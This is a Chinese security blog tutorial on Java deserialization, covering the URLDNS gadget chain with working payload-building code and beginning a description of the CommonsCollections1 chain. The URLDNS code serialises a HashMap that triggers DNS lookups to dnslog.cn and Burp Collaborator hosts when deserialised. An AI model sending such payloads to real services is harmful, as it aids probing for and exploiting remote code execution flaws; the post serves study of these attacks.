<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 4.2.1">
  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">
  <meta name="baidu-site-verification" content="FBx6u1uWmY">

<link rel="stylesheet" href="/css/main.css">


<link rel="stylesheet" href="/lib/font-awesome/css/font-awesome.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/gh/fancyapps/fancybox@3/dist/jquery.fancybox.min.css">


<script id="hexo-configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    hostname: new URL('https://chenzidu.github.io').hostname,
    root: '/',
    scheme: 'Gemini',
    version: '7.5.0',
    exturl: false,
    sidebar: {"position":"left","display":"post","offset":12,"onmobile":false},
    copycode: {"enable":true,"show_result":false,"style":"default"},
    back2top: {"enable":true,"sidebar":false,"scrollpercent":false},
    bookmark: {"enable":false,"color":"#222","save":"auto"},
    fancybox: true,
    mediumzoom: false,
    lazyload: false,
    pangu: false,
    algolia: {
      appID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    },
    localsearch: {"enable":true,"trigger":"auto","top_n_per_article":1,"unescape":false,"preload":false},
    path: 'search.xml',
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    sidebarPadding: 40
  };
</script>
  <meta name="description" content="反序列化是什么 序列化（Serialization）： 序列化是将对象的状态信息转换为可以存储或传输的形式的过程。在 Java 中，这通常意味着将对象转换为字节序列，以便可以将其写入文件、数据库或通过网络发送到另一个系统。 Java 通过实现 java.io.Serializable 接口来标识一个类是可序列化的。实现 Serializable 接口的类可以被 ObjectOutputStrea">
<meta property="og:type" content="article">
<meta property="og:title" content="Java安全-反序列化篇">
<meta property="og:url" content="https://chenzidu.github.io/2024/04/24/Java%E5%AE%89%E5%85%A8-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%AF%87/index.html">
<meta property="og:site_name" content="Chen&#39;Blog">
<meta property="og:description" content="反序列化是什么 序列化（Serialization）： 序列化是将对象的状态信息转换为可以存储或传输的形式的过程。在 Java 中，这通常意味着将对象转换为字节序列，以便可以将其写入文件、数据库或通过网络发送到另一个系统。 Java 通过实现 java.io.Serializable 接口来标识一个类是可序列化的。实现 Serializable 接口的类可以被 ObjectOutputStrea">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://chenzidu.github.io/2024/04/24/Java%E5%AE%89%E5%85%A8-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%AF%87/1.png">
<meta property="og:image" content="https://chenzidu.github.io/2024/04/24/Java%E5%AE%89%E5%85%A8-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%AF%87/2.png">
<meta property="og:image" content="https://chenzidu.github.io/2024/04/24/Java%E5%AE%89%E5%85%A8-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%AF%87/3.png">
<meta property="og:image" content="https://chenzidu.github.io/2024/04/24/Java%E5%AE%89%E5%85%A8-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%AF%87/4.png">
<meta property="og:image" content="https://chenzidu.github.io/2024/04/24/Java%E5%AE%89%E5%85%A8-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%AF%87/5.png">
<meta property="og:image" content="https://chenzidu.github.io/2024/04/24/Java%E5%AE%89%E5%85%A8-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%AF%87/6.png">
<meta property="og:image" content="https://chenzidu.github.io/2024/04/24/Java%E5%AE%89%E5%85%A8-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%AF%87/7.png">
<meta property="og:image" content="https://chenzidu.github.io/2024/04/24/Java%E5%AE%89%E5%85%A8-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%AF%87/8.png">
<meta property="article:published_time" content="2024-04-24T09:13:33.000Z">
<meta property="article:modified_time" content="2024-04-24T09:36:02.814Z">
<meta property="article:author" content="ChenZIDu">
<meta property="article:tag" content="Java">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://chenzidu.github.io/2024/04/24/Java%E5%AE%89%E5%85%A8-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%AF%87/1.png">

<link rel="canonical" href="https://chenzidu.github.io/2024/04/24/Java%E5%AE%89%E5%85%A8-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%AF%87/">


<script id="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome: false,
    isPost: true,
    isPage: false,
    isArchive: false
  };
</script>

  <title>Java安全-反序列化篇 | Chen'Blog</title>
  






  <noscript>
  <style>
  .use-motion .brand,
  .use-motion .menu-item,
  .sidebar-inner,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line-before i { left: initial; }
  .use-motion .logo-line-after i { right: initial; }
  </style>
</noscript>

<link rel="alternate" href="/atom.xml" title="Chen'Blog" type="application/atom+xml">
</head>

<body itemscope itemtype="http://schema.org/WebPage">
  <div class="container use-motion">
    <div class="headband"></div>

    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-meta">

    <div>
      <a href="/" class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">Chen'Blog</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
        <p class="site-subtitle">Life has its own fate, and meeting may not be accidental.</p>
  </div>

  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
      <span class="toggle-line toggle-line-first"></span>
      <span class="toggle-line toggle-line-middle"></span>
      <span class="toggle-line toggle-line-last"></span>
    </div>
  </div>
</div>


<nav class="site-nav">
  
  <ul id="menu" class="menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-fw fa-home"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-fw fa-user"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-fw fa-tags"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-fw fa-th"></i>分类</a>

  </li>
        <li class="menu-item menu-item-archives">

    <a href="/archives/" rel="section"><i class="fa fa-fw fa-archive"></i>归档</a>

  </li>
        <li class="menu-item menu-item-sitemap">

    <a href="/sitemap.xml" rel="section"><i class="fa fa-fw fa-sitemap"></i>站点地图</a>

  </li>
      <li class="menu-item menu-item-search">
        <a role="button" class="popup-trigger"><i class="fa fa-search fa-fw"></i>搜索
        </a>
      </li>
  </ul>

</nav>
  <div class="site-search">
    <div class="popup search-popup">
    <div class="search-header">
  <span class="search-icon">
    <i class="fa fa-search"></i>
  </span>
  <div class="search-input-container">
    <input autocomplete="off" autocorrect="off" autocapitalize="none"
           placeholder="搜索..." spellcheck="false"
           type="text" id="search-input">
  </div>
  <span class="popup-btn-close">
    <i class="fa fa-times-circle"></i>
  </span>
</div>
<div id="search-result"></div>

</div>
<div class="search-pop-overlay"></div>

  </div>
</div>
    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>


    <main class="main">
      <div class="main-inner">
        <div class="content-wrap">
          

          <div class="content">
            

  <div class="posts-expand">
      
  
  
  <article itemscope itemtype="http://schema.org/Article" class="post-block " lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://chenzidu.github.io/2024/04/24/Java%E5%AE%89%E5%85%A8-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%AF%87/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.jpg">
      <meta itemprop="name" content="ChenZIDu">
      <meta itemprop="description" content="">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="Chen'Blog">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          Java安全-反序列化篇
        </h1>

        <div class="post-meta">
            <span class="post-meta-item">
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              <span class="post-meta-item-text">发表于</span>
              

              <time title="创建时间：2024-04-24 17:13:33 / 修改时间：17:36:02" itemprop="dateCreated datePublished" datetime="2024-04-24T17:13:33+08:00">2024-04-24</time>
            </span>

          

<span class="post-time">
	   &nbsp; | &nbsp;
           <span class="post-meta-item-icon">
             <i class="fa fa-calendar-o"></i>
           </span>
           <span class="post-meta-item-text">字数统计:</span>
           <span class="post-count">4k(字)</span>
           
         </span>
	  
      <span class="post-time">
	   &nbsp; | &nbsp;
           <span class="post-meta-item-icon">
             <i class="fa fa-calendar-o"></i>
           </span>
           <span class="post-meta-item-text">阅读时长:</span>
           <span class="post-count">17(分)</span>
           
        </span>
            <span class="post-meta-item" title="阅读次数" id="busuanzi_container_page_pv" style="display: none;">
              <span class="post-meta-item-icon">
                <i class="fa fa-eye"></i>
              </span>
              <span class="post-meta-item-text">阅读次数：</span>
              <span id="busuanzi_value_page_pv"></span>
            </span>
  
  <span class="post-meta-item">
    
      <span class="post-meta-item-icon">
        <i class="fa fa-comment-o"></i>
      </span>
      <span class="post-meta-item-text">Valine：</span>
    
    <a title="valine" href="/2024/04/24/Java%E5%AE%89%E5%85%A8-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%AF%87/#comments" itemprop="discussionUrl">
      <span class="post-comments-count valine-comment-count" data-xid="/2024/04/24/Java%E5%AE%89%E5%85%A8-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%AF%87/" itemprop="commentCount"></span>
    </a>
  </span>
  
  

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">

      
        <p><a name="q3r26"></a></p>
<h2 id="反序列化是什么"><a href="#反序列化是什么" class="headerlink" title="反序列化是什么"></a>反序列化是什么</h2><ol>
<li><strong>序列化（Serialization）</strong>：<ul>
<li>序列化是将对象的状态信息转换为可以存储或传输的形式的过程。在 Java 中，这通常意味着将对象转换为字节序列，以便可以将其写入文件、数据库或通过网络发送到另一个系统。</li>
<li>Java 通过实现 java.io.Serializable 接口来标识一个类是可序列化的。实现 Serializable 接口的类可以被 ObjectOutputStream 类序列化。</li>
<li>序列化过程中，对象的类、属性和属性值都会被保存。如果对象图中包含其他对象的引用，这些对象也会被递归地序列化。</li>
<li>序列化的结果是一个字节流，通常保存在  ByteArrayOutputStream 或 FileOutputStream 中。</li>
</ul>
</li>
<li><strong>反序列化（Deserialization）</strong>：<ul>
<li>反序列化是序列化过程的逆过程。它涉及将保存的字节序列恢复为原来的对象状态。</li>
<li>在 Java 中，反序列化通常是通过 ObjectInputStream 类来完成的。这个类可以读取先前序列化的对象，并重建原始对象的状态。</li>
<li>反序列化时，需要确保序列化对象的类定义在当前运行环境中是可用的。如果类定义不可用，或者类的结构在序列化后发生了不兼容的变化，反序列化将失败，并可能抛出异常。</li>
<li>反序列化后，对象将恢复其原始状态，包括所有属性值和关联的对象引用。<br><a name="eq60t"></a><a id="more"></a></li>
</ul>
</li>
</ol>
<h4 id="说人话"><a href="#说人话" class="headerlink" title="说人话"></a>说人话</h4><ul>
<li><strong>Java 序列化</strong> 通常涉及使用 ObjectOutputStream 类将对象转换为字节流，这些字节流可以被存储或传输。</li>
<li><strong>Java 反序列化</strong> 通常涉及使用 ObjectInputStream 类将存储的字节流恢复为原始对象。<br><a name="pC7iz"></a></li>
</ul>
<h2 id="1、URLDNS链学习"><a href="#1、URLDNS链学习" class="headerlink" title="1、URLDNS链学习"></a>1、URLDNS链学习</h2><p><a name="kjXOa"></a></p>
<h3 id="简介：什么是URLDNS"><a href="#简介：什么是URLDNS" class="headerlink" title="简介：什么是URLDNS?"></a>简介：什么是URLDNS?</h3><p>URLDNS 反序列化链是一种在 Java 应用程序中用于检测反序列化漏洞的技术。这条链的主要作用是触发一个 DNS 请求，以此来验证目标应用程序是否存在反序列化漏洞。在实战环境中我们通常用URLDNS来判断是否存在反序列化漏洞，因为有些环境只有DNS能出网。<br><a name="GFs88"></a></p>
<h3 id="URLDNS链分析"><a href="#URLDNS链分析" class="headerlink" title="URLDNS链分析"></a>URLDNS链分析</h3><p><a href="https://github.com/frohoff/ysoserial" target="_blank" rel="noopener">ysoserial</a> - URLDNS链</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">URLDNS</span> <span class="keyword">implements</span> <span class="title">ObjectPayload</span>&lt;<span class="title">Object</span>&gt; </span>&#123;</span><br><span class="line"></span><br><span class="line">        <span class="function"><span class="keyword">public</span> Object <span class="title">getObject</span><span class="params">(<span class="keyword">final</span> String url)</span> <span class="keyword">throws</span> Exception </span>&#123;</span><br><span class="line"></span><br><span class="line">                <span class="comment">//在创建有效负载期间避免DNS解析</span></span><br><span class="line">                <span class="comment">//由于字段java.net. URL.handler是瞬态的</span></span><br><span class="line">                <span class="comment">//它不会成为序列化有效负载的一部分。</span></span><br><span class="line">                URLStreamHandler handler = <span class="keyword">new</span> SilentURLStreamHandler();</span><br><span class="line"></span><br><span class="line">                HashMap ht = <span class="keyword">new</span> HashMap(); <span class="comment">// 将包含URL的HashMap</span></span><br><span class="line">                URL u = <span class="keyword">new</span> URL(<span class="keyword">null</span>, url, handler); <span class="comment">// 用作密钥的URL</span></span><br><span class="line">                ht.put(u, url); <span class="comment">//该值可以是任何可序列化的值，作为键的URL是触发DNS查找的内容。</span></span><br><span class="line">            </span><br><span class="line">                <span class="comment">// 在上面的put期间，计算并缓存URL的hashCode。</span></span><br><span class="line">                <span class="comment">//这会重置它，以便下次调用hashCode时触发DNS查找。</span></span><br><span class="line">                Reflections.setFieldValue(u, <span class="string">"hashCode"</span>, -<span class="number">1</span>); </span><br><span class="line">                <span class="keyword">return</span> ht;</span><br><span class="line">        &#125;</span><br><span class="line"></span><br><span class="line">        <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(<span class="keyword">final</span> String[] args)</span> <span class="keyword">throws</span> Exception </span>&#123;</span><br><span class="line">                PayloadRunner.run(URLDNS<span class="class">.<span class="keyword">class</span>, <span class="title">args</span>)</span>;</span><br><span class="line">        &#125;</span><br><span class="line">       <span class="comment">/**</span></span><br><span class="line"><span class="comment">         *防止生成POC过程中发起dns请求</span></span><br><span class="line"><span class="comment">         */</span></span><br><span class="line">        <span class="keyword">static</span> <span class="class"><span class="keyword">class</span> <span class="title">SilentURLStreamHandler</span> <span class="keyword">extends</span> <span class="title">URLStreamHandler</span> </span>&#123;</span><br><span class="line"></span><br><span class="line">                <span class="function"><span class="keyword">protected</span> URLConnection <span class="title">openConnection</span><span class="params">(URL u)</span> <span class="keyword">throws</span> IOException </span>&#123;</span><br><span class="line">                        <span class="keyword">return</span> <span class="keyword">null</span>;</span><br><span class="line">                &#125;</span><br><span class="line"></span><br><span class="line">                <span class="function"><span class="keyword">protected</span> <span class="keyword">synchronized</span> InetAddress <span class="title">getHostAddress</span><span class="params">(URL u)</span> </span>&#123;</span><br><span class="line">                        <span class="keyword">return</span> <span class="keyword">null</span>;</span><br><span class="line">                &#125;</span><br><span class="line">        &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>HashMap这个类，<br />可以看到就是创建hashMap过程中，通过PUT数据导致的dns请求，根据注释我们可以知道，通过计算url的hash导致的dns请求。<br />我们跟hashMap类的put方法看看。发现了计算了hash。</p>
<img src="/2024/04/24/Java%E5%AE%89%E5%85%A8-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%AF%87/1.png" class="">
<p><br />继续跟进，如下图，发现计算了hashcode，而我们传入的key为 java.net.URL  ，所以继续跟进查看url类中的hashCode方法。<br /></p>
<img src="/2024/04/24/Java%E5%AE%89%E5%85%A8-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%AF%87/2.png" class="">
<p>transient 关键字，修饰Java序列化对象时，不需要序列化的属性。继续跟进URLStreamHandler类的hashCode方法，图中可以看到hashCode值默认为-1，当值不等于-1，会执行handler.hashcode(this)。<br /></p>
<img src="/2024/04/24/Java%E5%AE%89%E5%85%A8-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%AF%87/3.png" class="">
<img src="/2024/04/24/Java%E5%AE%89%E5%85%A8-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%AF%87/4.png" class="">
<p>发现有 getHostAddress  方法，继续跟进</p>
<img src="/2024/04/24/Java%E5%AE%89%E5%85%A8-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%AF%87/5.png" class="">
<p>继续跟进这个函数会发现，InetAddress.getByName(host) 的作用是根据主机名，获取其IP地址，在网络上其实就是一次 DNS查询。  <br /></p>
<img src="/2024/04/24/Java%E5%AE%89%E5%85%A8-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%AF%87/6.png" class="">

<p><a name="RoZWM"></a></p>
<h4 id="Gadget"><a href="#Gadget" class="headerlink" title="Gadget"></a>Gadget</h4><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">HashMap.readObject()</span><br><span class="line">  -&gt; HashMap.hash()</span><br><span class="line">    -&gt; URL.hashCode()</span><br><span class="line">      -&gt; URLStreamHandler.hashCode()</span><br><span class="line">        -&gt; URLStreamHandler.getHostAddress()</span><br></pre></td></tr></table></figure>
<p><a name="kRFrq"></a></p>
<h4 id="代码"><a href="#代码" class="headerlink" title="代码"></a>代码</h4><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> java.net.URL;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">Main</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception</span>&#123;</span><br><span class="line">        URL u = <span class="keyword">new</span> URL(<span class="string">"http://myc765.dnslog.cn"</span>);</span><br><span class="line">        u.hashCode();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> java.lang.reflect.Field;</span><br><span class="line"><span class="keyword">import</span> java.net.URL;</span><br><span class="line"><span class="keyword">import</span> java.util.HashMap;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">Main</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception</span>&#123;</span><br><span class="line">        String url =<span class="string">"test"</span>;</span><br><span class="line">        HashMap&lt;URL, String&gt; ht = <span class="keyword">new</span> HashMap&lt;URL, String&gt;();</span><br><span class="line">        URL u = <span class="keyword">new</span> URL(<span class="string">"https://hfjgk3.dnslog.cn"</span>);</span><br><span class="line">        ht.put(u, url);  <span class="comment">//测试put，这环节会请求dns</span></span><br><span class="line">        Class&lt;?&gt; clazz = Class.forName(<span class="string">"java.net.URL"</span>);</span><br><span class="line">        Field m = clazz.getDeclaredField(<span class="string">"hashCode"</span>);</span><br><span class="line">        m.setAccessible(<span class="keyword">true</span>);</span><br><span class="line">        <span class="comment">//反序列化后会请求dns</span></span><br><span class="line">        m.set(u,<span class="number">0xfffff</span>); <span class="comment">//第一次查询的时候会进行缓存，所以让它不等于-1</span></span><br><span class="line">        <span class="comment">// 向HashMap中添加新的键值对</span></span><br><span class="line">        ht.put(u, <span class="string">"test"</span>);</span><br><span class="line">        <span class="comment">// 修改hashCode的值</span></span><br><span class="line">        m.set(u,-<span class="number">1</span>); <span class="comment">//让它等于-1 就是在反序列化的时候等于-1 执行dns查询</span></span><br><span class="line">        <span class="keyword">return</span>;</span><br><span class="line"></span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p><a name="uy1ch"></a></p>
<h3 id="测试URLDNS链"><a href="#测试URLDNS链" class="headerlink" title="测试URLDNS链"></a>测试URLDNS链</h3><p><a name="rU8CG"></a></p>
<h4 id="代码-1"><a href="#代码-1" class="headerlink" title="代码"></a>代码</h4><p>序列化</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> java.io.FileOutputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.ObjectOutputStream;</span><br><span class="line"><span class="keyword">import</span> java.lang.reflect.Field;</span><br><span class="line"><span class="keyword">import</span> java.net.URL;</span><br><span class="line"><span class="keyword">import</span> java.util.HashMap;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">urlDndLoad</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception</span>&#123;</span><br><span class="line">        String url =<span class="string">"test"</span>;</span><br><span class="line">        HashMap&lt;URL, String&gt; ht = <span class="keyword">new</span> HashMap&lt;URL, String&gt;();</span><br><span class="line">        URL u = <span class="keyword">new</span> URL(<span class="string">"https://v51n4ni6idg5qmakyyofp9zfq6w2kr.burpcollaborator.net"</span>);</span><br><span class="line">        Class&lt;?&gt; clazz = Class.forName(<span class="string">"java.net.URL"</span>);</span><br><span class="line">        Field m = clazz.getDeclaredField(<span class="string">"hashCode"</span>);</span><br><span class="line">        m.setAccessible(<span class="keyword">true</span>);</span><br><span class="line">        m.set(u,<span class="number">2</span>); <span class="comment">//第一次查询的时候会进行缓存，所以让它不等于-1</span></span><br><span class="line"></span><br><span class="line">        ht.put(u, <span class="string">"test"</span>); <span class="comment">// 向HashMap中添加新的键值对</span></span><br><span class="line">        <span class="comment">// 修改hashCode的值</span></span><br><span class="line">        m.set(u,-<span class="number">1</span>); <span class="comment">//让它等于-1 就是在反序列化的时候等于-1 执行dns查询</span></span><br><span class="line">        Serializable(ht);</span><br><span class="line">    &#125;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">Serializable</span><span class="params">(Object obj)</span> <span class="keyword">throws</span> Exception </span>&#123;</span><br><span class="line">        ObjectOutputStream objectOutputStream = <span class="keyword">new</span> ObjectOutputStream(<span class="keyword">new</span> FileOutputStream(<span class="string">"ser.ser"</span>));</span><br><span class="line">        objectOutputStream.writeObject(obj);</span><br><span class="line">        objectOutputStream.close();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>反序列化调用</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> java.io.FileInputStream;</span><br><span class="line"><span class="keyword">import</span> java.io.ObjectInputStream;</span><br><span class="line"></span><br><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">class</span> <span class="title">serTestLoad</span> </span>&#123;</span><br><span class="line">    <span class="function"><span class="keyword">public</span> <span class="keyword">static</span> <span class="keyword">void</span> <span class="title">main</span><span class="params">(String[] args)</span> <span class="keyword">throws</span> Exception </span>&#123;</span><br><span class="line">        <span class="comment">//反序列化类</span></span><br><span class="line">        ObjectInputStream objectInputStream = <span class="keyword">new</span> ObjectInputStream((<span class="keyword">new</span> FileInputStream(<span class="string">"ser.ser"</span>)));</span><br><span class="line">        <span class="comment">// 读出来并反序列化</span></span><br><span class="line">        objectInputStream.readObject();</span><br><span class="line">        objectInputStream.close();</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<img src="/2024/04/24/Java%E5%AE%89%E5%85%A8-%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E7%AF%87/7.png" class="">
<p><a name="SC5w0"></a></p>
<h2 id="2、CommonsCollections1链"><a href="#2、CommonsCollections1链" class="headerlink" title="2、CommonsCollections1链"></a>2、CommonsCollections1链</h2><p><a name="dPAtm"></a></p>
<h3 id="什么是CommonsCollections链"><a href="#什么是CommonsCollections链" class="headerlink" title="什么是CommonsCollections链"></a>什么是CommonsCollections链</h3><ol>
<li><strong>构造恶意对象</strong>：攻击者创建一个包含恶意代码的集合对象，比如一个 Map。</li>
<li><strong>利用 Transformer</strong>：通过 Commons Collections 中的 Transformer 类，攻击者可以定义一个转换逻辑，这个逻辑在反序列化时执行。</li>
<li><strong>利用 AnnotationInvocationHandler</strong>：AnnotationInvocationHandler 是 Java 中的一个私有类，它可以被用来调用任何方法。通过构造特定的 Transformer，攻击者可以触发 AnnotationInvocationHandler 的构造函数。</li>
<li><strong>执行 Runtime.exec</strong>：通过 AnnotationInvocationHandler，攻击者可以调用 Runtime 类的 exec 方法，从而执行任意命令。</li>
<li><strong>反序列化</strong>：当应用程序反序列化了攻击者构造的恶意对象时，会触发上述的转换逻辑，最终导致任意代码执行。<br><a name="yMvnz"></a></li>
</ol>
<h3 id="基础知识学习"><a href="#基础知识学习" class="headerlink" title="基础知识学习"></a>基础知识学习</h3><p>学习这条链需要知道几个类和接口：<br /><strong>Transformer</strong></p>
<ul>
<li><p>org.apache.commons.collections.Transformer 接口定义了一个单一的方法 transform（），它接受一个对象并返回一个新对象。在 Commons Collections 1 链中，Transformer 用于转换对象，是构建复杂操作链的基础。</p>
</li>
<li><p>transform()方法，用来定义具体的转换逻辑，方法接收Object类型的input，处理后将Object返回，在Commons-Collection中，程序提供了多个Transformer的实现类，用来实现不同的TransformedMap类中key、value进行修改的功能。</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">public</span> <span class="class"><span class="keyword">interface</span> <span class="title">Transformer</span> </span>&#123;</span><br><span class="line"> <span class="function"><span class="keyword">public</span> Object <span class="title">transform</span><span class="params">(Object input)</span></span>;</span><br><span class="line"> &#125;</span><br></pre></td></tr></table></figure>
<p><strong>TransformedMap</strong></p>
</li>
